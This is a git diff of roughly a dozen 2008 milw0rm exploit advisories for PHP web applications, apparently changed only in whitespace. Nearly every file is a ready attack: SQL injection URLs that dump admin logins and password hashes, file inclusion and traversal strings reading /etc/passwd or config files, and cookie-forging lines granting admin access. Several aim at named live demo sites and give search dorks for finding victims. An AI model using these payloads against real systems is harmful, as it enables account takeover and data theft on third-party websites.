diff --git a/platforms/php/webapps/6608.txt b/platforms/php/webapps/6608.txt
index 88155ea6a..41963e5c9 100755
--- a/platforms/php/webapps/6608.txt
+++ b/platforms/php/webapps/6608.txt
@@ -1,62 +1,62 @@
-|___________________________________________________|
-|
-| ZEELYRICS v2.0 (bannerclick.php adid) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------Hussin X----------------------|
-|
-|    Author: Hussin X
-|
-|    Home : IQ-SecuritY  >   www.IQ-tY.com
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|
-|___________________________________________________
-|                                                   |
-|
-| script http://zeeways.com/main/products/ZEELYRICS-v2.0.html
-|
-|___________________________________________________|
-
-Exploit: 
-________
-
-
-
-www.[target].com/Script/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--
-
-
-
-
-L!VE DEMO:
-_________
-
-
-http://www.zeelyrics.com/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--
-
-
-
-
-
-___________________
-
-
-Admin  LogiN :
-
-www.[target].com/Script/admin/
-
-
-____________________________( Greetz )_________________________________
-|
-|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
-|
-|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
-|
-|     FAHD | Iraqihack  | str0ke | Cyber-Zone
-|_____________________________________________________________________
-
-
-                       Im IRAQi
-
-# milw0rm.com [2008-09-28]
+|___________________________________________________|
+|
+| ZEELYRICS v2.0 (bannerclick.php adid) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|---------------------Hussin X----------------------|
+|
+|    Author: Hussin X
+|
+|    Home : IQ-SecuritY  >   www.IQ-tY.com
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|
+|___________________________________________________
+|                                                   |
+|
+| script http://zeeways.com/main/products/ZEELYRICS-v2.0.html
+|
+|___________________________________________________|
+
+Exploit: 
+________
+
+
+
+www.[target].com/Script/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--
+
+
+
+
+L!VE DEMO:
+_________
+
+
+http://www.zeelyrics.com/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--
+
+
+
+
+
+___________________
+
+
+Admin  LogiN :
+
+www.[target].com/Script/admin/
+
+
+____________________________( Greetz )_________________________________
+|
+|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
+|
+|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
+|
+|     FAHD | Iraqihack  | str0ke | Cyber-Zone
+|_____________________________________________________________________
+
+
+                       Im IRAQi
+
+# milw0rm.com [2008-09-28]
diff --git a/platforms/php/webapps/6611.php b/platforms/php/webapps/6611.php
index 782f09feb..c999bad7c 100755
--- a/platforms/php/webapps/6611.php
+++ b/platforms/php/webapps/6611.php
@@ -1,48 +1,48 @@
-#!/usr/bin/php -q
-
-
-# milw0rm.com [2008-09-28]
+#!/usr/bin/php -q
+
+
+# milw0rm.com [2008-09-28]
diff --git a/platforms/php/webapps/6612.txt b/platforms/php/webapps/6612.txt
index 95a0bf42b..6d90cba5f 100755
--- a/platforms/php/webapps/6612.txt
+++ b/platforms/php/webapps/6612.txt
@@ -1,18 +1,18 @@
-Author: ~!Dok_tOR!~
-Date found: 28.09.08
-Product: Pro Chat Rooms
-Version: 3.0.3
-Price: $55
-URL: www.prochatrooms.com
-Vulnerability Class: SQL Injection
-Condition: magic_quotes_gpc = Off
-
-Exploit 1:
-
-http://localhost/[installdir]/profiles/index.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,password,email),3,4,5,6,7,8+from+prochatrooms_users/*
-
-Exploit 2:
-
-http://localhost/[installdir]/profiles/admin.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,password,email),3,4,5,6,7,8+from+prochatrooms_users/*
-
-# milw0rm.com [2008-09-28]
+Author: ~!Dok_tOR!~
+Date found: 28.09.08
+Product: Pro Chat Rooms
+Version: 3.0.3
+Price: $55
+URL: www.prochatrooms.com
+Vulnerability Class: SQL Injection
+Condition: magic_quotes_gpc = Off
+
+Exploit 1:
+
+http://localhost/[installdir]/profiles/index.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,password,email),3,4,5,6,7,8+from+prochatrooms_users/*
+
+Exploit 2:
+
+http://localhost/[installdir]/profiles/admin.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,password,email),3,4,5,6,7,8+from+prochatrooms_users/*
+
+# milw0rm.com [2008-09-28]
diff --git a/platforms/php/webapps/6613.txt b/platforms/php/webapps/6613.txt
index e287bd4f5..059ebb0ae 100755
--- a/platforms/php/webapps/6613.txt
+++ b/platforms/php/webapps/6613.txt
@@ -1,44 +1,44 @@
---==+================================================================================+==--
---==+       Pilot Online Training Solution Remote SQL Injection Vulnerbility         +==--
---==+================================================================================+==--
-
--=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
-AUTHOR: S.W.A.T.
-
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
-
-Site: http://www.elmspro.com/etraining/
-
--=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
-DORK (google): "Powered by PG Online Training Solution - learning management system"
-
--=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
-DESCRIPTION:
-You Can See Admin User & MD5 Password ..::.. Then Crack It & Login ;) :D
-
--=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
-EXPLOITS:
-www.site.com/news_read.php?id=-1/**/union/**/select/**/1,login,3,4,password,6,7,8,9/**/from/**/students/*
-
-Online Demo:
-http://www.elmspro.com/etraining/demo/news_read.php?id=-1/**/union/**/select/**/1,login,3,4,password,6,7,8,9/**/from/**/students/*
-
--=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
-NOTE/TIP:
-
-Admin Login Is At /admin/
-
-
--=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
-
---==+================================================================================+==--
---==+       Pilot Online Training Solution Remote SQL Injection Vulnerbility         +==--
---==+================================================================================+==--
-
-# milw0rm.com [2008-09-28]
+--==+================================================================================+==--
+--==+       Pilot Online Training Solution Remote SQL Injection Vulnerbility         +==--
+--==+================================================================================+==--
+
+-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+AUTHOR: S.W.A.T.
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+Site: http://www.elmspro.com/etraining/
+
+-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+DORK (google): "Powered by PG Online Training Solution - learning management system"
+
+-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+DESCRIPTION:
+You Can See Admin User & MD5 Password ..::.. Then Crack It & Login ;) :D
+
+-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+EXPLOITS:
+www.site.com/news_read.php?id=-1/**/union/**/select/**/1,login,3,4,password,6,7,8,9/**/from/**/students/*
+
+Online Demo:
+http://www.elmspro.com/etraining/demo/news_read.php?id=-1/**/union/**/select/**/1,login,3,4,password,6,7,8,9/**/from/**/students/*
+
+-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+NOTE/TIP:
+
+Admin Login Is At /admin/
+
+
+-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+
+--==+================================================================================+==--
+--==+       Pilot Online Training Solution Remote SQL Injection Vulnerbility         +==--
+--==+================================================================================+==--
+
+# milw0rm.com [2008-09-28]
diff --git a/platforms/php/webapps/6617.txt b/platforms/php/webapps/6617.txt
index b138c0fb7..56e19e871 100755
--- a/platforms/php/webapps/6617.txt
+++ b/platforms/php/webapps/6617.txt
@@ -1,23 +1,23 @@
--------------------------------------------------------------------------
-  --          JIKI Team [ JIKO + KIl1er ]        ---
--------------------------------------------------------------------------
-# Author  : jiko
-# email  : jalikom@hotmail.com
-# Home   : www.no-back.org
-# Script  : BbZL.PhP
-# Bug   : Local Directory Traversal
-# Download  : http://sylvain.pasquet1.free.fr/index.php?type=1&base=vjek&nom=Téléchargements
-=========================JIkI Team===================
-# Exploit  :
- http://localhost/cc/bbzl092/index.php?type=3&lien_2=../
-#ex   :
-http://sylvain.pasquet1.free.fr/index.php?type=3&lien_2=config
-http://barbeuzweb.free.fr/index.php?type=3&lien_2=config
-=========================JIKI Team===================
- greetz : all my friend and H-T Team and Stack-Terrorist and Gold_M and all No-back members and tryag.Com
- visit: www.no-back.org & www.tryag.com 
--------------------------------------------------------------------------
-  --            JIKI Team [ JIKO + KIl1er ]    --
--------------------------------------------------------------------------
-
-# milw0rm.com [2008-09-28]
+-------------------------------------------------------------------------
+  --          JIKI Team [ JIKO + KIl1er ]        ---
+-------------------------------------------------------------------------
+# Author  : jiko
+# email  : jalikom@hotmail.com
+# Home   : www.no-back.org
+# Script  : BbZL.PhP
+# Bug   : Local Directory Traversal
+# Download  : http://sylvain.pasquet1.free.fr/index.php?type=1&base=vjek&nom=Téléchargements
+=========================JIkI Team===================
+# Exploit  :
+ http://localhost/cc/bbzl092/index.php?type=3&lien_2=../
+#ex   :
+http://sylvain.pasquet1.free.fr/index.php?type=3&lien_2=config
+http://barbeuzweb.free.fr/index.php?type=3&lien_2=config
+=========================JIKI Team===================
+ greetz : all my friend and H-T Team and Stack-Terrorist and Gold_M and all No-back members and tryag.Com
+ visit: www.no-back.org & www.tryag.com 
+-------------------------------------------------------------------------
+  --            JIKI Team [ JIKO + KIl1er ]    --
+-------------------------------------------------------------------------
+
+# milw0rm.com [2008-09-28]
diff --git a/platforms/php/webapps/6618.txt b/platforms/php/webapps/6618.txt
index 01a5fcd32..cecb16a4d 100755
--- a/platforms/php/webapps/6618.txt
+++ b/platforms/php/webapps/6618.txt
@@ -1,15 +1,15 @@
-Joomla Imagebrowser File Inc.
-
-
-Cr@zy_King / www.biyosecurity.com / sqL Lov3r'Z Crew Co. 2008
-
-
-Down : http://www.joomlatr.org/index.php/component/remository/?func=fileinfo&id=129
-
-
-FI   : http://127.0.0.1/index.php?option=com_imagebrowser&folder=../../../../
-
-
-Grtz : aLL My Friend'z ... 
-
-# milw0rm.com [2008-09-28]
+Joomla Imagebrowser File Inc.
+
+
+Cr@zy_King / www.biyosecurity.com / sqL Lov3r'Z Crew Co. 2008
+
+
+Down : http://www.joomlatr.org/index.php/component/remository/?func=fileinfo&id=129
+
+
+FI   : http://127.0.0.1/index.php?option=com_imagebrowser&folder=../../../../
+
+
+Grtz : aLL My Friend'z ... 
+
+# milw0rm.com [2008-09-28]
diff --git a/platforms/php/webapps/6620.txt b/platforms/php/webapps/6620.txt
index 8e74cc781..c1c76304c 100755
--- a/platforms/php/webapps/6620.txt
+++ b/platforms/php/webapps/6620.txt
@@ -1,35 +1,35 @@
-########################################################
-PHP-Fusion Mod freshlinks (linkid) Remote SQL Injection Vulnerability
-########################################################
-
-
-
-++++++++++++++++++++++++++++
-Author     :     boom3rang
-webpage  :    www.khg-crew.ws 
-greetz     :    H!tm@N, KHG, chs, redc00de, pr0xy-ki11er | Kosova Hackers Group.
-++++++++++++++++++++++++++++
-
-
-
-
-[+] Dork:                     inurl:"freshlinks_panel/index.php?linkid"
-
-[+] Example:         http://localhost/infusions/freshlinks_panel/index.php?linkid= [SQL] &frame
-
-username:
-index.php?linkid=-9999/**/union/**/all/**/select/**/1,user_name,3,4,5,6,7,8/**/from/**/fusion_users--&frame
-
-password: 
-index.php?linkid=-9999/**/union/**/all/**/select/**/1,user_password,3,4,5,6,7,8/**/from/**/fusion_users--&frame
-
-
-ps. Username and Password you can find in Title!
-
-############################################
-                     =United State of Albania=
-                        -Porud 2 be Albanian-
-                        -Proud 2 be Muslim-
-############################################
-
-# milw0rm.com [2008-09-28]
+########################################################
+PHP-Fusion Mod freshlinks (linkid) Remote SQL Injection Vulnerability
+########################################################
+
+
+
+++++++++++++++++++++++++++++
+Author     :     boom3rang
+webpage  :    www.khg-crew.ws 
+greetz     :    H!tm@N, KHG, chs, redc00de, pr0xy-ki11er | Kosova Hackers Group.
+++++++++++++++++++++++++++++
+
+
+
+
+[+] Dork:                     inurl:"freshlinks_panel/index.php?linkid"
+
+[+] Example:         http://localhost/infusions/freshlinks_panel/index.php?linkid= [SQL] &frame
+
+username:
+index.php?linkid=-9999/**/union/**/all/**/select/**/1,user_name,3,4,5,6,7,8/**/from/**/fusion_users--&frame
+
+password: 
+index.php?linkid=-9999/**/union/**/all/**/select/**/1,user_password,3,4,5,6,7,8/**/from/**/fusion_users--&frame
+
+
+ps. Username and Password you can find in Title!
+
+############################################
+                     =United State of Albania=
+                        -Porud 2 be Albanian-
+                        -Proud 2 be Muslim-
+############################################
+
+# milw0rm.com [2008-09-28]
diff --git a/platforms/php/webapps/6621.txt b/platforms/php/webapps/6621.txt
index 160a3d71b..6446d2d06 100755
--- a/platforms/php/webapps/6621.txt
+++ b/platforms/php/webapps/6621.txt
@@ -1,9 +1,9 @@
-###############################################################################################
-[+] BbZL.PhP 0.92 Insecure Cookie Handling Vulnerability
-[+] Discovered By Stack            
-[+] Greetz : All my freind           
-################################################################################################
-Exploit:
-javascript:document.cookie = "phorum_admin_session=1; path=/";
-
-# milw0rm.com [2008-09-28]
+###############################################################################################
+[+] BbZL.PhP 0.92 Insecure Cookie Handling Vulnerability
+[+] Discovered By Stack            
+[+] Greetz : All my freind           
+################################################################################################
+Exploit:
+javascript:document.cookie = "phorum_admin_session=1; path=/";
+
+# milw0rm.com [2008-09-28]
diff --git a/platforms/php/webapps/6623.txt b/platforms/php/webapps/6623.txt
index 97df5a268..9c49a5e95 100755
--- a/platforms/php/webapps/6623.txt
+++ b/platforms/php/webapps/6623.txt
@@ -1,36 +1,36 @@
-#########################################################
-#
-# Events Calendar 1.1
-
-Remote File Inclusion Vulnerability
-
-
-#========================================================
-# Author: kevin mitnick( tunisianblackhat team ) =
-# =
-# Home : http://tunisianblackhat.com =
-# =
-# email: kevinmitnick[A]live.fr =
-# =
-#=========================================================
-#
-# script : Events Calendar 1.1#
-http://webscripts.softpedia.com/script/Calendar-Systems/Events-Calendar-WebBiscuits-46424.html
-# DorK : Events Calendar 1.1#
-##########################################################
-
-[~] Exploit :
-
-
-http://youwebsite/panel/common/theme/default/header_setup.php?path[docroot]=[EV!L]
-http://youwebsite/panel/common/theme/default/header_setup.php?component=[EV!L]
-
-########################( Greetz )###########################
-# marw駭_neo , mrabah12R ,KaMiKaZe ,NaRuTo ,hijacker #
-# Boomrang_Victim and all tunisian hackers #
-# #
-# #
-# #
-###########################################################
-
-# milw0rm.com [2008-09-29]
+#########################################################
+#
+# Events Calendar 1.1
+
+Remote File Inclusion Vulnerability
+
+
+#========================================================
+# Author: kevin mitnick( tunisianblackhat team ) =
+# =
+# Home : http://tunisianblackhat.com =
+# =
+# email: kevinmitnick[A]live.fr =
+# =
+#=========================================================
+#
+# script : Events Calendar 1.1#
+http://webscripts.softpedia.com/script/Calendar-Systems/Events-Calendar-WebBiscuits-46424.html
+# DorK : Events Calendar 1.1#
+##########################################################
+
+[~] Exploit :
+
+
+http://youwebsite/panel/common/theme/default/header_setup.php?path[docroot]=[EV!L]
+http://youwebsite/panel/common/theme/default/header_setup.php?component=[EV!L]
+
+########################( Greetz )###########################
+# marw駭_neo , mrabah12R ,KaMiKaZe ,NaRuTo ,hijacker #
+# Boomrang_Victim and all tunisian hackers #
+# #
+# #
+# #
+###########################################################
+
+# milw0rm.com [2008-09-29]
diff --git a/platforms/php/webapps/6624.txt b/platforms/php/webapps/6624.txt
index 2535a9374..4ac7ca3bb 100755
--- a/platforms/php/webapps/6624.txt
+++ b/platforms/php/webapps/6624.txt
@@ -1,62 +1,62 @@
-|___________________________________________________|
-|
-| Arcadem Pro (articlecat) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------Hussin X----------------------|
-|
-|    Author: Hussin X
-|
-|    Home :  WwW.IQ-ty.CoM |  WwW.TrYaG.CC
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|
-|
-|___________________________________________________
-|                                                   |
-|
-| script : https://secure.agaresmedia.com/index.php?page=arcadempro.php
-|
-| DorK   : Copyright © 2007 Agares Media. Powered by AMCMS3.
-|___________________________________________________|
-
-
-Exploit:
-________
-
-
-
-www.[target].com/Script/index.php?loadpage=./includes/articleblock.php&articlecat=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10/**/FROM/**/amcms_users--
-
-
-USer version
-
-
-www.[target].com/Script/index.php?loadpage=./includes/articleblock.php&articlecat=-1+union+select+1,version(),user(),4,5,6,7,8,9,10--
-
-
-
-
-
-Admin LogIn :
-
-www.[target].com/admin/
-
-
-
-
-
-____________________________( Greetz )_________________________________
-|
-|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
-|
-|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
-|
-|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone
-|______________________________________________________________________
-
-
-                             Im IRAQi
-
-# milw0rm.com [2008-09-29]
+|___________________________________________________|
+|
+| Arcadem Pro (articlecat) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|---------------------Hussin X----------------------|
+|
+|    Author: Hussin X
+|
+|    Home :  WwW.IQ-ty.CoM |  WwW.TrYaG.CC
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|
+|
+|___________________________________________________
+|                                                   |
+|
+| script : https://secure.agaresmedia.com/index.php?page=arcadempro.php
+|
+| DorK   : Copyright © 2007 Agares Media. Powered by AMCMS3.
+|___________________________________________________|
+
+
+Exploit:
+________
+
+
+
+www.[target].com/Script/index.php?loadpage=./includes/articleblock.php&articlecat=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10/**/FROM/**/amcms_users--
+
+
+USer version
+
+
+www.[target].com/Script/index.php?loadpage=./includes/articleblock.php&articlecat=-1+union+select+1,version(),user(),4,5,6,7,8,9,10--
+
+
+
+
+
+Admin LogIn :
+
+www.[target].com/admin/
+
+
+
+
+
+____________________________( Greetz )_________________________________
+|
+|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
+|
+|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
+|
+|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone
+|______________________________________________________________________
+
+
+                             Im IRAQi
+
+# milw0rm.com [2008-09-29]
diff --git a/platforms/php/webapps/6625.txt b/platforms/php/webapps/6625.txt
index 0641d1e30..1fa633f92 100755
--- a/platforms/php/webapps/6625.txt
+++ b/platforms/php/webapps/6625.txt
@@ -1,14 +1,14 @@
-Post Comments v3.0 Insecure Cookie Handling Vulnerability
-****************************
-By Crackers_Child
-****************************
-Demo : http://www.phpjabbers.com/post-comment/try/admin.php
-
-Vendor :   by phpjabbers.com
-
-Exploit : javascript:document.cookie = "PostCommentsAdmin=logged; path=/";
-****************************
-Tum Musluman Aleminin Ramazan Bayrami Kutlu Olsun.
-****************************
-
-# milw0rm.com [2008-09-29]
+Post Comments v3.0 Insecure Cookie Handling Vulnerability
+****************************
+By Crackers_Child
+****************************
+Demo : http://www.phpjabbers.com/post-comment/try/admin.php
+
+Vendor :   by phpjabbers.com
+
+Exploit : javascript:document.cookie = "PostCommentsAdmin=logged; path=/";
+****************************
+Tum Musluman Aleminin Ramazan Bayrami Kutlu Olsun.
+****************************
+
+# milw0rm.com [2008-09-29]
diff --git a/platforms/php/webapps/6626.txt b/platforms/php/webapps/6626.txt
index 35768a7c6..baf66127f 100755
--- a/platforms/php/webapps/6626.txt
+++ b/platforms/php/webapps/6626.txt
@@ -1,45 +1,45 @@
-==================================================================================================================
-          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
-          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
-          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
-              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
-          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
-===================================================SNAKES TEAM====================================================
-+                                                                                                                =
-=           PG Matchmaking Script  Multiple  Remote SQL Injection Vulnerability                                        +
-+                                                                                                                =
-==============================================:::ALGERIAN HaCkEr:::===============================================
-                =        =                                                                =          =
-                =      =           Discovered By: Super Cristal  :::ALGERIAN HaCkEr:::         =     =   
-                =                                                                                    =
-                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
-                =                                                                                    =
-                =      =               :::::Mail: Super_Cristal@hotmail.com:::::::             =     =
-                =                                                                                    =
-                =        = ::::script Demo: http://www.datingpro.com/matchmaking/demo::::=         =
-                =                                                                                    =
-                ======================================Super Cristal===================================
-#product home: datingpro.com                                                      
-#dork:find it
-
-Exploit(1):
-********
-http://localhost/[script_path]/news_read.php?id=-20 UNION SELECT 1,concat_ws(0x3e,Login,Password,EMail),3,4,5 FROM ADMINS--
-Exploit(2):
-http://localhost/[script_path]/gifts_show.php?id=-101 UNION SELECT 1,concat_ws(0x3e,Login,Password,EMail),3,4,5,6,7 FROM ADMINS--
-               
-demo::::
-http://www.datingpro.com/matchmaking/demo/news_read.php?id=-20 UNION SELECT 1,concat_ws(0x3e,Login,Password,EMail),3,4,5 FROM ADMINS--
-
-                                
-                                                    
-
-===================================================================================================================
-
-Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALL www.Snakespc.com/SC >>>> Members 
-
-===================================================================================================================
-                                  
-                                                          ::::Super_Cristal@Hotmail.CoM::::
-
-# milw0rm.com [2008-09-29]
+==================================================================================================================
+          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
+          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
+          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
+              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
+          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
+===================================================SNAKES TEAM====================================================
++                                                                                                                =
+=           PG Matchmaking Script  Multiple  Remote SQL Injection Vulnerability                                        +
++                                                                                                                =
+==============================================:::ALGERIAN HaCkEr:::===============================================
+                =        =                                                                =          =
+                =      =           Discovered By: Super Cristal  :::ALGERIAN HaCkEr:::         =     =   
+                =                                                                                    =
+                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
+                =                                                                                    =
+                =      =               :::::Mail: Super_Cristal@hotmail.com:::::::             =     =
+                =                                                                                    =
+                =        = ::::script Demo: http://www.datingpro.com/matchmaking/demo::::=         =
+                =                                                                                    =
+                ======================================Super Cristal===================================
+#product home: datingpro.com                                                      
+#dork:find it
+
+Exploit(1):
+********
+http://localhost/[script_path]/news_read.php?id=-20 UNION SELECT 1,concat_ws(0x3e,Login,Password,EMail),3,4,5 FROM ADMINS--
+Exploit(2):
+http://localhost/[script_path]/gifts_show.php?id=-101 UNION SELECT 1,concat_ws(0x3e,Login,Password,EMail),3,4,5,6,7 FROM ADMINS--
+               
+demo::::
+http://www.datingpro.com/matchmaking/demo/news_read.php?id=-20 UNION SELECT 1,concat_ws(0x3e,Login,Password,EMail),3,4,5 FROM ADMINS--
+
+                                
+                                                    
+
+===================================================================================================================
+
+Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALL www.Snakespc.com/SC >>>> Members 
+
+===================================================================================================================
+                                  
+                                                          ::::Super_Cristal@Hotmail.CoM::::
+
+# milw0rm.com [2008-09-29]
diff --git a/platforms/php/webapps/6628.txt b/platforms/php/webapps/6628.txt
index 02e43c354..cd08e2d94 100755
--- a/platforms/php/webapps/6628.txt
+++ b/platforms/php/webapps/6628.txt
@@ -1,20 +1,20 @@
-####################################################################################
-######              Local File Inclusion Vulnerabilities                       #####
-###### http://www.the-ghost.com/extras/am2/am%202.0%20beta%201.zip             #####
-###### author : JIKO                                                           #####
-###### foor read a php file >     ?rss=[name of file iwthout php]              #####
-###### for execute exploit does not write extention of file                    #####
-######                                                                         #####
-######                                                                         #####
-###### exploit : /Script/rss.php?rss=../[name of file wthout php]              #####
-######                                                                         #####
-###### example : /Script/rss.php?rss==/home/user/shell                         #####
-######                                                                         #####
-###### other files:        rss=../../../../etc/passwd%00                       #####
-######           WwW.No-exploit.Com  cha7ta.eu                                 #####
-######  H-T Team , v4 Team  , Tryag , no-Back all my friend                    #####
-####################################################################################
-------==        troops of Mohamed comming inchalah     =-----------------
-Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc
-
-# milw0rm.com [2008-09-29]
+####################################################################################
+######              Local File Inclusion Vulnerabilities                       #####
+###### http://www.the-ghost.com/extras/am2/am%202.0%20beta%201.zip             #####
+###### author : JIKO                                                           #####
+###### foor read a php file >     ?rss=[name of file iwthout php]              #####
+###### for execute exploit does not write extention of file                    #####
+######                                                                         #####
+######                                                                         #####
+###### exploit : /Script/rss.php?rss=../[name of file wthout php]              #####
+######                                                                         #####
+###### example : /Script/rss.php?rss==/home/user/shell                         #####
+######                                                                         #####
+###### other files:        rss=../../../../etc/passwd%00                       #####
+######           WwW.No-exploit.Com  cha7ta.eu                                 #####
+######  H-T Team , v4 Team  , Tryag , no-Back all my friend                    #####
+####################################################################################
+------==        troops of Mohamed comming inchalah     =-----------------
+Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc
+
+# milw0rm.com [2008-09-29]
diff --git a/platforms/php/webapps/6629.txt b/platforms/php/webapps/6629.txt
index 53e938a47..10a4db08c 100755
--- a/platforms/php/webapps/6629.txt
+++ b/platforms/php/webapps/6629.txt
@@ -1,56 +1,56 @@
-|___________________________________________________|
-|
-| FAQ Management (catid) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|--------------------    Hussin X  -------------------|
-|
-|    Author: Hussin X
-|
-|    Home :  WwW.IQ-ty.CoM
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|
-|
-|___________________________________________________
-|                                                   |
-|
-| script : http://www.quidascript.com/index.php?main_page=product_info&cPath=1_15&products_id=80
-|
-| DorK   : inurl:cfaq/index.php?catid=
-|
-| DorK   : inurl:index.php?catid=
-|___________________________________________________|
-
-
-
-
-
-
-Exploit: 
-
-www.[target].com/Script/index.php?catid=-1+union+select+concat(username,0x3a,password),2+FROM+cfaq_admin--
-
-
-AdmiN LoGiN :
-
-www.[target].com/Script//admin.php
-
-
-
-
-
-____________________________( Greetz )_________________________________
-|
-|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
-|
-|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
-|
-|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab
-|______________________________________________________________________
-
-
-                                       Im IRAQi    |    Im TrYaG I
-
-# milw0rm.com [2008-09-30]
+|___________________________________________________|
+|
+| FAQ Management (catid) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|--------------------    Hussin X  -------------------|
+|
+|    Author: Hussin X
+|
+|    Home :  WwW.IQ-ty.CoM
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|
+|
+|___________________________________________________
+|                                                   |
+|
+| script : http://www.quidascript.com/index.php?main_page=product_info&cPath=1_15&products_id=80
+|
+| DorK   : inurl:cfaq/index.php?catid=
+|
+| DorK   : inurl:index.php?catid=
+|___________________________________________________|
+
+
+
+
+
+
+Exploit: 
+
+www.[target].com/Script/index.php?catid=-1+union+select+concat(username,0x3a,password),2+FROM+cfaq_admin--
+
+
+AdmiN LoGiN :
+
+www.[target].com/Script//admin.php
+
+
+
+
+
+____________________________( Greetz )_________________________________
+|
+|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
+|
+|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
+|
+|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab
